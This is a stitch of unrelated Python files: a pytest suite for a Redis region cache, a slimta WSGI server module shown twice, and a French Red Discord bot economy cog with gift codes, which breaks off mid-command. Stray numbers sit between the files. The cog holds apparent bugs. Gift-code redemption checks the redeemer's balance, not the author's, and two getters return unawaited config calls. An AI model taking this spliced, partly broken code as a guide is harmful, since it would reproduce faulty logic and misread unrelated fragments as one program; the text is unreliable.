import pytest from collections import namedtuple from region_cache import RegionCache @pytest.fixture(params=[ {'REGION_CACHE_URL': 'redis://localhost:6379/5'}, { 'REGION_CACHE_URL': 'redis://localhost:6379/5', 'REGION_CACHE_RR_URL': 'redis://localhost:6379/5' }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_RR_HOST': 'localhost', 'REGION_CACHE_RR_PORT': 6379 }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_OP_TIMEOUT': 0.5 }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_OP_TIMEOUT': 0.5, 'REGION_CACHE_OP_TIMEOUT_RAISE': False, 'REGION_CACHE_OP_TIMEOUT_RECONNECT': True, 'REGION_CACHE_REDIS_OPTIONS': { 'max_connections': 3 } } ]) def app(request): return namedtuple('app', ['config'])(config=request.param) @pytest.fixture() def region_cache(app): c = RegionCache() c.init_app(app) c.conn.flushall() yield c c.conn.flushall() @pytest.fixture() def region(region_cache): r = region_cache.region('example_region') yield r r.invalidate() @pytest.fixture() def region_with_timeout(region_cache): r = region_cache.region('timed_region', timeout=2) yield r r.invalidate() def test_init_app(app): c = RegionCache() c.init_app(app) assert c.conn assert c.conn.ping() assert c._root assert c._root_name in c._regions assert c._regions[c._root_name] is c._root assert len(c._regions) == 1 def test_subregions(region_cache): r = region_cache.region('abc.xyz') assert '{region_cache._root_name}.abc'.format(region_cache=region_cache) in region_cache._regions assert '{region_cache._root_name}.abc.xyz'.format(region_cache=region_cache) in region_cache._regions assert 'abc.xyz' not in region_cache._regions assert 'xyz' not in region_cache._regions r1 = region_cache.region('xml', timeout=60) assert r1._timeout == 60 r2 = r1.region('json') assert r2._timeout == 60 def test_region_context_manager(region): with region as r: r['key1'] = 0 
r['key2'] = 1 assert 'key1' in region assert 'key2' in region assert region._region_cache.conn.hget(region.name, 'key1') is not None assert region._region_cache.conn.hget(region.name, 'key2') is not None def test_invalidate(region): region['key'] = 'value' region.invalidate() assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None sb = region.region('sub') sb['key2'] = 'value' region.invalidate() assert region._region_cache.conn.hget(sb.name, 'key2') is None assert 'key2' not in sb def test_invalidate_region(region_cache, region): region['key'] = 'value' region_cache.region('root').invalidate() assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None sb = region.region('sub') sb['key2'] = 'value' region.invalidate() assert region._region_cache.conn.hget(sb.name, 'key2') is None assert 'key2' not in sb def test_items(region): region['foo'] = 'bar' assert region['foo'] == 'bar' assert region._region_cache.conn.hget(region.name, 'foo') is not None del region['foo'] assert pytest.raises(KeyError, lambda: region['foo']) def test_children(region): sb = region.region('sub') assert sb in list(region.children()) def test_iter(region, region_cache): region['foo'] = 'bar' assert [x for x in region] region.invalidate() def test_invalidate_on(region): import blinker s = blinker.signal('named_signal') t = blinker.signal('other_signal') region['key'] = 'value' region.invalidate_on(s, t) s.send('nothing',in_='particular') assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None region['key'] = 'value' t.send('nothing', in_='particular') assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None def test_cached(region): called = [0] @region.cached def foobar(k, x=None): called[0] += 1 return k foobar(1) assert called[0] == 1 foobar(1) assert called[0] == 1 def test_get_or_compute(region): x = region.get_or_compute('computed_key', 0) assert 
'computed_key' in region assert region['computed_key'] == 0 assert x == 0 y = region.get_or_compute('computed_key2', lambda: 200) assert y == 200 assert 'computed_key2' in region assert region['computed_key2'] == 200 def test_invalidate_connections(region_cache): region_cache.invalidate_connections() assert region_cache._w_conn is None assert region_cache._r_conn is None def test_reconnect_backoff(region, region_cache): region['key1'] = 0 region['key2'] = 1 region_cache._reconnect_backoff = 5 # 5 second backoff before trying to reconnect region_cache.invalidate_connections() assert region_cache.is_disconnected() with pytest.raises(KeyError): region['key1'] assert region_cache._w_conn is None assert region_cache._r_conn is None def test_timeout_with_context(region_with_timeout): with region_with_timeout as r: r['key1'] = 0 r['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout import time time.sleep(1) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout time.sleep(1.5) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) == -2 assert 'key1' not in region_with_timeout assert 'key2' not in region_with_timeout def test_timeout(region_with_timeout): region_with_timeout['key1'] = 0 region_with_timeout['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert 
region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout import time time.sleep(1) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout time.sleep(1.5) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) == -2 assert 'key1' not in region_with_timeout assert 'key2' not in region_with_timeout # make sure we can recreate the region. region_with_timeout['key1'] = 0 region_with_timeout['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout subregion = region_with_timeout.region("subregion") subregion['key1'] = 0 subregion['key2'] = 1 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert 'key1' in subregion assert 'key2' in subregion import time time.sleep(1) assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert 'key1' in subregion assert 'key2' in subregion time.sleep(1.5) assert subregion._region_cache.conn.ttl(subregion.name) == -2 assert 'key1' 
not in subregion assert 'key2' not in subregion # make sure we can recreate the region. subregion['key1'] = 0 subregion['key2'] = 1 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert 'key1' in subregion assert 'key2' in subregion
0.64646
0.284792
from __future__ import absolute_import import sys from gevent.pywsgi import WSGIServer as GeventWSGIServer from slimta import logging __all__ = ['WsgiServer'] log = logging.getHttpLogger(__name__) class WsgiServer(object): """Implements the base class for a WSGI server that logs its requests and responses and can easily be deployed as a functioning HTTP server. Instances of this class can be used as applications in WSGI server engines, or :meth:`.build_server` can be used. """ def build_server(self, listener, pool=None, ssl_args=None): """Constructs and returns a WSGI server engine, configured to use the current object as its application. :param listener: Usually a ``(ip, port)`` tuple defining the interface and port upon which to listen for connections. :param pool: If given, defines a specific :class:`gevent.pool.Pool` to use for new greenlets. :param ssl_args: Optional dictionary of TLS settings, causing sockets to be encrypted on connection. See :class:`~gevent.pywsgi.WSGIServer` for details. :rtype: :class:`gevent.pywsgi.WSGIServer` """ spawn = pool or 'default' ssl_args = ssl_args or {} return GeventWSGIServer(listener, self, log=sys.stdout, spawn=spawn, **ssl_args) def handle(self, environ, start_response): """Overridden by sub-classes to handle WSGI requests and generate a response. This method should be used as if it were the WSGI application function. :param environ: The WSGI environment variables_. :param start_response: Call this function to initiate the WSGI response. :returns: An iterable of raw data parts to return with the response. """ raise NotImplementedError() def __call__(self, environ, start_response): """When this object is used as a WSGI application, this method logs the request and ensures that the response will be logged as well. The request is then proxied to :meth:`.handle` for processing. 
""" log.wsgi_request(environ) def logged_start_response(status, headers, *args, **kwargs): log.wsgi_response(environ, status, headers) return start_response(status, headers, *args, **kwargs) return self.handle(environ, logged_start_response) # vim:et:fdm=marker:sts=4:sw=4:ts=4
slimta/http/wsgi.py
from __future__ import absolute_import import sys from gevent.pywsgi import WSGIServer as GeventWSGIServer from slimta import logging __all__ = ['WsgiServer'] log = logging.getHttpLogger(__name__) class WsgiServer(object): """Implements the base class for a WSGI server that logs its requests and responses and can easily be deployed as a functioning HTTP server. Instances of this class can be used as applications in WSGI server engines, or :meth:`.build_server` can be used. """ def build_server(self, listener, pool=None, ssl_args=None): """Constructs and returns a WSGI server engine, configured to use the current object as its application. :param listener: Usually a ``(ip, port)`` tuple defining the interface and port upon which to listen for connections. :param pool: If given, defines a specific :class:`gevent.pool.Pool` to use for new greenlets. :param ssl_args: Optional dictionary of TLS settings, causing sockets to be encrypted on connection. See :class:`~gevent.pywsgi.WSGIServer` for details. :rtype: :class:`gevent.pywsgi.WSGIServer` """ spawn = pool or 'default' ssl_args = ssl_args or {} return GeventWSGIServer(listener, self, log=sys.stdout, spawn=spawn, **ssl_args) def handle(self, environ, start_response): """Overridden by sub-classes to handle WSGI requests and generate a response. This method should be used as if it were the WSGI application function. :param environ: The WSGI environment variables_. :param start_response: Call this function to initiate the WSGI response. :returns: An iterable of raw data parts to return with the response. """ raise NotImplementedError() def __call__(self, environ, start_response): """When this object is used as a WSGI application, this method logs the request and ensures that the response will be logged as well. The request is then proxied to :meth:`.handle` for processing. 
""" log.wsgi_request(environ) def logged_start_response(status, headers, *args, **kwargs): log.wsgi_response(environ, status, headers) return start_response(status, headers, *args, **kwargs) return self.handle(environ, logged_start_response) # vim:et:fdm=marker:sts=4:sw=4:ts=4
0.688259
0.247544
import asyncio import logging import random import re import string import time from copy import copy from datetime import datetime, timedelta import discord from discord.errors import HTTPException from typing import Union, List, Tuple, Literal from redbot.core import Config, commands, checks from redbot.core.utils import AsyncIter from redbot.core.utils.menus import start_adding_reactions from redbot.core.utils.chat_formatting import box, humanize_number, humanize_timedelta from tabulate import tabulate logger = logging.getLogger("red.AwsmCogs.cash") class CashError(Exception): """Classe de base pour les erreurs Cash""" class BalanceTooHigh(CashError): """Soulevée lorsque le balance dépasse le seuil fixé""" class UnauthorizedMember(CashError): """Soulevée lorsqu'un membre n'est pas autorisé à réaliser une action""" class UserNotFound(CashError): """Soulevée lorsqu'un membre n'est pas retrouvé sur le serveur""" class UnknownGiftCode(CashError): """Soulevée lorsque le code cadeau donné n'existe pas""" class GiftCodeExpired(CashError): """Soulevée lorsqu'un code cadeau vient d'expirer""" def _invalid_amount(value: int) -> bool: return value < 0 class Account: def __init__(self, user: discord.Member, balance: int, logs: list, config: dict): self.user = user self.guild = user.guild self.balance = balance self.logs = logs self.config = config def __str__(self): return self.user.mention def __int__(self): return self.balance class Log: def __init__(self, user: discord.Member, text: str, timestamp: int, delta: int): self.user = user self.guild = user.guild self.text = text self.timestamp = timestamp self.delta = delta def __str__(self): return self.text def __int__(self): return self.timestamp class GiftCode: def __init__(self, code: str, author: discord.Member, expire: int, value: int): self.code = code self.author, self.guild = author, author.guild self.expire = expire self.value = value def __str__(self): return self.code def __int__(self): return self.value class 
Cash(commands.Cog): """Economie virtuelle et jeux utilisant celle-ci""" def __init__(self, bot): super().__init__() self.bot = bot self.config = Config.get_conf(self, identifier=736144321857978388, force_registration=True) default_member = {"balance": 0, "logs": [], "config": {"day_delta": [None, 0], "cache_daily_bonus": '', "cache_presence_bonus": 0} } default_guild = {"currency": "Ꞥ", "daily_bonus": 100, "presence_bonus": 0, "presence_delay": 600, "gift_codes": {}} default_global = {"max_balance": 10**9, "max_logs_length": 3} self.config.register_member(**default_member) self.config.register_guild(**default_guild) self.config.register_global(**default_global) async def get_currency(self, guild: discord.Guild) -> str: """Obtenir le symbole de la monnaie du serveur""" return await self.config.guild(guild).currency() async def set_currency(self, guild: discord.Guild, symbol: str) -> str: """Modifie le symbole de la monnaie du serveur Renvoie le nouveau symbole attribué""" if not isinstance(symbol, str): raise TypeError("Type du symbole invalide, {} != str".format(type(symbol))) if len(symbol) > 5: raise ValueError("Le symbole de la monnaie ne peut pas faire plus de 5 caractères de long") await self.config.guild(guild).currency.set(symbol) return symbol async def get_account(self, member: discord.Member) -> Account: """Obtenir l'objet Account du membre demandé""" userdata = await self.config.member(member).all() return Account(member, **userdata) async def get_balance(self, member: discord.Member) -> int: """Renvoie la valeur actuelle du solde d'un membre""" account = await self.get_account(member) return account.balance async def enough_balance(self, member: discord.Member, cost: int) -> bool: """Vérifie si le membre possède assez de fonds pour une dépense""" if not isinstance(cost, int): raise TypeError("Type de la dépense invalide, {} != int".format(type(cost))) if _invalid_amount(cost): return False return await self.get_balance(member) >= cost async def 
set_balance(self, member: discord.Member, value: int) -> int: """Modifier le solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type du dépôt invalide, {} != int".format(type(value))) if value < 0: raise ValueError("Le solde ne peut être négatif") max_balance = await self.config.max_balance() if value > max_balance: raise BalanceTooHigh(f"Il est impossible de dépasser le seuil fixé de {max_balance} crédits") oldvalue = await self.config.member(member).balance() await self.edit_delta(member, value - oldvalue) await self.config.member(member).balance.set(value) return value async def deposit_credits(self, member: discord.Member, value: int) -> int: """Ajouter des crédits au solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type du dépôt invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur de dépôt invalide, {value} < 0") current = await self.get_balance(member) return await self.set_balance(member, current + value) async def remove_credits(self, member: discord.Member, value: int) -> int: """Retirer des crédits au solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type de retrait invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur de retrait invalide, {value} < 0") current = await self.get_balance(member) if value > current: raise ValueError(f"Fonds insuffisants, {value} > {current}") return await self.set_balance(member, current - value) async def transfert_credits(self, from_: discord.Member, to_: discord.Member, value: int) -> Tuple[Account, Account]: """Transfère des crédits d'un membre à un autre Renvoie un tuple contenant les comptes des deux membres""" if not isinstance(value, int): raise TypeError("Type du transfert invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur du 
transfert invalide, {value} < 0") max_balance = await self.config.max_balance() if await self.get_balance(to_) + value > max_balance: raise BalanceTooHigh(f"Il est impossible de dépasser le seuil fixé de {max_balance} crédits lors d'une " f"transaction") await self.remove_credits(from_, value) await self.deposit_credits(to_, value) return await self.get_account(from_), await self.get_account(to_) async def gen_gcode(self, guild: discord.Guild) -> str: """Génère un code unique au format $XX-YYY pour les codes cadeaux Cap. max. théorique = 52 521 875 codes uniques""" current_codes = await self.config.guild(guild).gift_codes() r = lambda long: ''.join(random.choices(string.ascii_uppercase + string.digits, k=long)) code = f"${r(2)}-{r(3)}" while code in current_codes: code = f"${r(2)}-{r(3)}" return code async def new_gift_code(self, from_: discord.Member, value: int, timestamp: int) -> str: """Génère un nouveau code cadeau contenant une certaine somme Le code est valide seulement sur le serveur du membre ayant généré le code Renvoie le code généré""" if not isinstance(value, int): raise TypeError("Type de valeur invalide, {} != int".format(type(value))) if not isinstance(timestamp, int): raise TypeError("Type du timestamp d'expiration invalide, {} != int".format(type(timestamp))) if value < 0: raise ValueError("La valeur de crédits contenus dans le code doit être positif") if timestamp < 0: raise ValueError("La valeur de l'expiration doit être positive ou nulle") guild = from_.guild code = await self.gen_gcode(guild) current = await self.config.guild(guild).gift_codes() current[code] = {"value": value, "expire": timestamp, "author": from_.id} await self.config.guild(guild).gift_codes.set(current) return code async def fetch_gift_code(self, code: str, ref_user: discord.Member = None) -> Union[GiftCode, None]: """Retrouve automatiquement le serveur d'un code et renvoie celui-ci si trouvé, sinon None""" if not isinstance(code, str): raise TypeError("Type du code 
invalide, {} != str".format(type(code))) all_guilds = await self.config.all_guilds() for guildid in all_guilds: if code in all_guilds[guildid]["gift_codes"]: guild = self.bot.get_guild(guildid) if guild: if ref_user is not None and ref_user in guild.members: return await self.get_gift_code(guild, code) else: return await self.get_gift_code(guild, code) return None async def get_gift_code(self, guild: discord.Guild, code: str) -> Union[GiftCode, None]: """Renvoie un objet *GiftCode* s'il est trouvé, sinon None""" if not isinstance(code, str): raise TypeError("Le code est invalide, {} != str".format(type(code))) codes = await self.config.guild(guild).gift_codes() if code in codes: c = codes[code] if time.time() > c["expire"]: del codes[code] await self.config.guild(guild).gift_codes.set(codes) raise GiftCodeExpired(f"Le code cadeau {code} vient d'expirer") user = guild.get_member(c["author"]) if not user: raise UserNotFound(f"Le membre avec l'ID {c['author']} est introuvable") return GiftCode(author=user, value=c["value"], code=code, expire=c["expire"]) return None async def use_gift_code(self, user: discord.Member, code: str) -> Union[int, bool]: """Utilise un code et renvoie la valeur qu'il contenait si le membre générateur possède suffisamment de fonds, sinon renvoie False""" gift = await self.get_gift_code(user.guild, code) if not gift: raise UnknownGiftCode(f"Le code cadeau {code} n'existe pas pour GUILD_ID={user.guild.id}") if not await self.enough_balance(user, gift.value): return False await self.transfert_credits(gift.author, user, gift.value) return await self.remove_gift_code(user.guild, code) async def remove_gift_code(self, guild: discord.Guild, code: str) -> int: """Supprime le code et renvoie la valeur contenue dans celui-ci""" try: gift = await self.get_gift_code(guild, code) if not gift: raise UnknownGiftCode(f"Le code cadeau {code} n'existe pas pour GUILD_ID={guild.id}") await self.config.guild(guild).gift_codes.clear_raw(code) return gift.value 
except: raise ValueError(f"Le code cadeau {code} n'est pas valide") async def get_delta(self, member: discord.Member, yield_date: bool = False) -> Union[int, list]: """Renvoie la valeur et date du delta total des opérations du membre""" acc = await self.get_account(member) delta = acc.config["day_delta"] return delta[1] if not yield_date else delta async def edit_delta(self, member: discord.Member, value: int) -> int: """Modifie la valeur du delta des opérations du jour Renvoie la nouvelle valeur du delta""" if not isinstance(value, int): raise TypeError("Type de la valeur du delta invalide, {} != int".format(type(value))) date, delta = await self.get_delta(member, True) today = datetime.now().strftime("%Y.%m.%d") if date != today: delta = 0 await self.config.member(member).config.set_raw("day_delta", value=[today, delta + value]) return delta + value async def get_log(self, member: discord.Member, timestamp: int) -> Union[Log, None]: """Renvoie le (1er) log du membre correspondant au timestamp fourni si trouvé, sinon None""" if not isinstance(timestamp, int): raise TypeError("Type du timestamp invalide, {} != int".format(type(timestamp))) acc = await self.get_account(member) for log in acc.logs: if log["timestamp"] == timestamp: return Log(**log) return None async def get_member_logs(self, member: discord.Member) -> Union[List[Log], list]: """Renvoie tous les logs (sous forme d'objets Log) d'un membre Renvoie une liste vide si aucun log n'est présent""" acc = await self.get_account(member) all_logs = [] if acc.logs: for log in acc.logs: all_logs.append(Log(member, **log)) return all_logs async def add_log(self, member: discord.Member, text: str, delta: int) -> list: """Ajoute un log au membre visé Renvoie le nouvel état des logs""" if not isinstance(text, str): raise TypeError("Type du contenu du log invalide, {} != str".format(type(text))) if not isinstance(delta, int): raise TypeError("Type de somme du log invalide, {} != int".format(type(delta))) added = 
{"text": text, "timestamp": int(time.time()), "delta": delta} acc = await self.get_account(member) logs = acc.logs max_logs_length = await self.config.max_logs_length() if len(logs) >= max_logs_length: logs = logs[-(max_logs_length - 1):] logs.append(added) await self.config.member(member).logs.set(logs) return logs async def delete_log(self, member: discord.Member, timestamp: int) -> list: """Retire un log (ou plusieurs s'ils ont un timestamp identique) au membre visé Typiquement optionnel, les logs étant remplacés au fur et à mesure des ajouts Renvoie le nouvel état des logs""" if not isinstance(timestamp, int): raise TypeError("Type du timestamp du log invalide, {} != int".format(type(timestamp))) if not await self.get_log(member, timestamp): raise ValueError(f"Log avec le timestamp {timestamp} pour USERID={member.id} introuvable") acc = await self.get_account(member) logs = acc.logs new = copy(logs) for log in logs: if log["timestamp"] == timestamp: new.remove(log) await self.config.member(member).logs.set(new) return new async def wipe_logs(self, member: discord.Member) -> None: """Supprime tous les logs d'un membre""" await self.config.member(member).clear_raw("logs") async def wipe_guild(self, guild: discord.Guild) -> None: """Supprime les données bancaires des membres d'un serveur""" await self.config.clear_all_members(guild) async def wipe_account(self, member: discord.Member) -> None: """Supprime les données bancaires d'un membre""" await self.config.member(member).clear() async def raw_delete_account(self, user_id: int, guild: discord.Guild) -> None: """Supprime un compte bancaire par ID du membre""" await self.config.member_from_ids(guild.id, user_id).clear() async def get_max_balance(self) -> int: """Renvoie la valeur maximale que peut atteindre un solde de membre (sur n'importe quel serveur)""" return self.config.max_balance() async def set_max_balance(self, value: int) -> None: """Modifie la valeur maximale qu'un solde de membre peut atteindre""" if 
not isinstance(value, int): raise TypeError("Type de la valeur maximale invalide, {} != int".format(type(value))) if value <= 0: raise ValueError("Valeur invalide, le maximum ne peut pas être négatif ou nul") await self.config.max_balance.set(value) async def get_max_logs_length(self) -> int: """Renvoie le nombre maximal de logs pouvant être stockés dans les données bancaires d'un membre""" return self.config.max_logs_length() async def set_max_logs_length(self, length: int) -> None: """Modifie le nombre de logs stockés pour un membre""" if not isinstance(length, int): raise TypeError("Type de la longueur maximale invalide, {} != int".format(type(length))) if length < 1: raise ValueError("Valeur invalide, le maximum ne peut pas être négatif ou nul") await self.config.max_logs_length.set(length) async def get_guild_leaderboard(self, guild: discord.Guild, cutoff: int = None) -> Union[list, List[Account]]: """Renvoie le top des membres les plus riches du serveur (liste d'objets Account) Renvoie une liste vide si aucun top n'est générable""" users = await self.config.all_members(guild) sorted_users = sorted(list(users.items()), key=lambda u: u[1]["balance"], reverse=True) top = [] for uid, acc in sorted_users: user = guild.get_member(uid) if user: top.append(Account(user, **acc)) return top[:cutoff] if cutoff else top async def get_leaderboard_position_for(self, member: discord.Member) -> int: """Renvoie la position du membre dans le classement de son serveur Renvoie la dernière place du classement si le membre n'est pas trouvé""" top = await self.get_guild_leaderboard(member.guild) for acc in top: if acc.user == member: return top.index(acc) + 1 return len(top) async def utils_parse_timedelta(self, time_string: str) -> timedelta: """Renvoie un objet *timedelta* à partir d'un str contenant des informations de durée (Xj Xh Xm Xs)""" if not isinstance(time_string, str): raise TypeError("Le texte à parser est invalide, {} != str".format(type(time_string))) regex = 
re.compile('^((?P<days>[\\.\\d]+?)j)? *((?P<hours>[\\.\\d]+?)h)? *((?P<minutes>[\\.\\d]+?)m)? *((?P<seconds>[\\.\\d]+?)s)? *$') sch = regex.match(time_string) if not sch: raise ValueError("Aucun timedelta n'a pu être déterminé des valeurs fournies") parsed = sch.groupdict() return timedelta(**{i: int(parsed[i]) for i in parsed if parsed[i]}) # Commandes -----------------------v @commands.group(name="bank", aliases=["b"], invoke_without_command=True) async def _bank_actions(self, ctx, user: discord.Member = None): """Commandes de gestion du compte bancaire virtuel *Cash*""" if ctx.invoked_subcommand is None: return await ctx.invoke(self.show_bank, user=user) @_bank_actions.command(name="show") @commands.guild_only() async def show_bank(self, ctx, user: discord.Member = None): """Afficher les infos de son compte""" user = user if user else ctx.message.author acc = await self.get_account(user) curr = await self.get_currency(ctx.guild) hum_balance = humanize_number(acc.balance) em = discord.Embed(color=user.color, timestamp=ctx.message.created_at) em.set_author(name="Compte de " + str(user), icon_url=user.avatar_url) em.add_field(name="💰 Solde", value=box(f"{hum_balance} {curr}")) delta = await self.get_delta(user) delta_emoji = "📉" if delta < 0 else "📈" em.add_field(name=f"{delta_emoji} Variation", value=box(f"{delta:+}")) top = await self.get_leaderboard_position_for(user) em.add_field(name="🏅 Position", value=box(f"#{top}")) logs = await self.get_member_logs(user) if logs: txt = "\n".join([f"{log.delta:+} · {log.text[:50]}" for log in logs][::-1]) em.add_field(name="📃 Historique", value=txt) await ctx.send(embed=em) @_bank_actions.command(name="give") @commands.guild_only() @commands.cooldown(1, 60, commands.BucketType.member) async def bank_give(self, ctx, receveur: discord.Member, somme: int): """Transférer de l'argent à un receveur tiers""" try: await self.transfert_credits(ctx.author, receveur, int(somme)) curr = await self.get_currency(ctx.guild) await 
ctx.send(f"**Transfert réalisé** • {receveur.mention} a reçu **{somme}** {curr}") except ValueError: return await ctx.send("**Impossible** • Vous ne pouvez pas transférer une somme nulle ou négative") except BalanceTooHigh: plaf = humanize_number(await self.config.max_balance()) return await ctx.send(f"**Limite atteinte** • {receveur.mention} ne peut pas recevoir cette somme car " f"il dépasserait le plafond fixé de {plaf}") await self.add_log(ctx.author, f"Transfert d'argent à {receveur.name}", -somme) await self.add_log(receveur, f"Reception d'argent de {ctx.author.name}", somme) @_bank_actions.command(name="gift") @commands.guild_only() @commands.cooldown(1, 60, commands.BucketType.member) async def bank_gift(self, ctx, somme: int, expire: str = "24h"): """Générer un code cadeau contenant des crédits (retrait différé) Le retrait de crédits sur le compte du membre générateur n'est pas immédiat et l'utilisation du code sera impossible en cas de manque de fonds Par défaut les codes expirent au bout de 24h, vous pouvez modifier cela avec le paramètre *<expire>* en utilisant le format `\"Xj Xh Xm Xs\"`""" user = ctx.author if somme < 1: return await ctx.send( "**Erreur** • La valeur doit être positive (sup. 
à 0)") try: tdelta = await self.utils_parse_timedelta(expire) except ValueError: return await ctx.send("**Erreur** • Le temps d'expiration n'est pas valide, utilisez le format `\"Xj Xh Xm Xs\"`") if await self.enough_balance(user, somme): timestamp = (datetime.now() + tdelta).timestamp() curr = await self.get_currency(ctx.guild) em = discord.Embed(title=f"**Nouveau code-cadeau** · {somme} {curr}", description="**En cours de génération...**") em.add_field(name="Information", value="Un membre peut utiliser ce code avec `b open`\n" "Vous serez débité de la valeur du code lors de son utilisation\n" "L'expiration du code rend impossible son utilisation, pour " "détruire le code avant sa date d'expiration utilisez-le vous-même.") em.set_footer(text="Ce code expirera dans {}".format(humanize_timedelta(timedelta=tdelta))) try: dm = await user.send(embed=em) except: return await ctx.send("**Erreur** • Je ne peux pas générer de code si vous ne me permettez pas de vous envoyer un MP") try: code = await self.new_gift_code(user, somme, int(timestamp)) await asyncio.sleep(1) em.description = box(code) em.colour = user.color await dm.edit(embed=em) except ValueError as e: await ctx.send( f"**Erreur** • La génération du code n'a pas pu se faire en raison d'un problème dans les valeurs fournies : `{e}`") em.description = box("Erreur dans la génération du code") await dm.edit(embed=em) else: await ctx.send( "**Impossible** • Même si le retrait n'est pas immédiat, vous devez avoir la somme sur votre compte préalablement à la génération d'un code") @_bank_actions.command(name="open") async def bank_open_gift(self, ctx, code: str): """Utiliser un code-cadeau et obtenir son contenu Les codes ne fonctionnent que sur le serveur où ils ont été générés""" code = code.upper().strip() try: if ctx.guild: gift = await self.get_gift_code(ctx.guild, code) else: gift = await self.fetch_gift_code(code) except ValueError: return await ctx.send("**Invalide** • Le code fourni est invalide, vérifiez-le 
et réessayez") except GiftCodeExpired: return await ctx.send("**Expiré** • Le code fourni a expiré, consultez le générateur du code pour en obtenir un nouveau") if gift: guild = gift.guild curr = await self.get_currency(guild) hum_value = humanize_number(gift.value) content = f"{hum_value} {curr}" em = discord.Embed(title=f"**Code-cadeau** · {code}", description="Voulez-vous échanger le code contre son contenu ?") em.add_field(name="Contenu", value=box(content)) em.set_footer(text="🎁 Accepter | ❌ Refuser") emojis = ["🎁", "❌"] msg = await ctx.send(embed=em) start_adding_reactions(msg, emojis) try: react, user = await self.bot.wait_for("reaction_add", check=lambda r, u: u == ctx.author and r.message.id == msg.id, timeout=20) except asyncio.TimeoutError: await msg.delete() return else: emoji = react.emoji await msg.delete() if emoji == "🎁": if await self.enough_balance(gift.author, gift.value): try: await self.use_gift_code(ctx.author, code) except Exception as e: logger.error(e, exc_info=True) return await ctx.send("Erreur de transfert de fonds : `{}`".format(str(e).replace('\"', ''))) await self.add_log(ctx.author, "Utilisation d'un code-cadeau", gift.value) await self.add_log(gift.author, "Débit du code cadeau utilisé", -gift.value) await ctx.send(f"**Utilisation réussie** • **{humanize_number(gift.value)}** {curr} ont été " f"transférés sur votre compte.") else: await ctx.send(f"**Fonds insuffisants** • L'auteur du code ({str(gift.author)}) n'a plus les " f"fonds suffisants pour assumer la valeur de ce code") else: await ctx.send(f"**Code invalide** • Le code est invalide ou celui-ci a peut-être expiré") @commands.command(name="bonus") @commands.guild_only() async def cash_bonus(self, ctx): """Recevoir son bonus quotidien de crédits""" author = ctx.author today = datetime.now().strftime("%Y.%m.%d") acc = await self.get_account(author) curr = await self.get_currency(ctx.guild) bonus = await self.config.guild(ctx.guild).daily_bonus() if bonus: if 
